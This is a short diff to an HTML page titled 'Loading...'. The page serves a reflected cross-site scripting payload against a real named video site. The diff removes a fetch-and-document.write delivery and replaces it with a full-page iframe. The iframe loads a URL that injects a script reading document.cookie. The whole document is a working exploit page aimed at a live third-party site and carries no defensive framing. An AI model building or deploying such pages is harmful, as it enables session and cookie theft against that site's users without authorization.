--- a/index.html
+++ b/index.html
@@ -4,22 +4,6 @@
     <title>Loading...</title>
 </head>
 <body>
-    <h1>Loading content, please wait...</h1>
-    
-    <script>
-        // Make request to vulnerable endpoint with XSS payload
-        fetch('https://video.fc2.com/a/list_catlist_thumb?osqdl"><script>alert(document.cookie)</script>szy6o=1', {
-            credentials: 'include'
-        })
-        .then(response => response.text())
-        .then(html => {
-            // Inject the response into the page - this will execute the XSS
-            document.write(html);
-            document.close();
-        })
-        .catch(error => {
-            document.body.innerHTML = '<h1>Error loading content</h1>';
-        });
-    </script>
+    <iframe src='https://video.fc2.com/a/list_catlist_thumb?osqdl"><script>alert(document.cookie)</script>szy6o=1' style="width:100%;height:100vh;border:none;"></iframe>
 </body>
 </html>
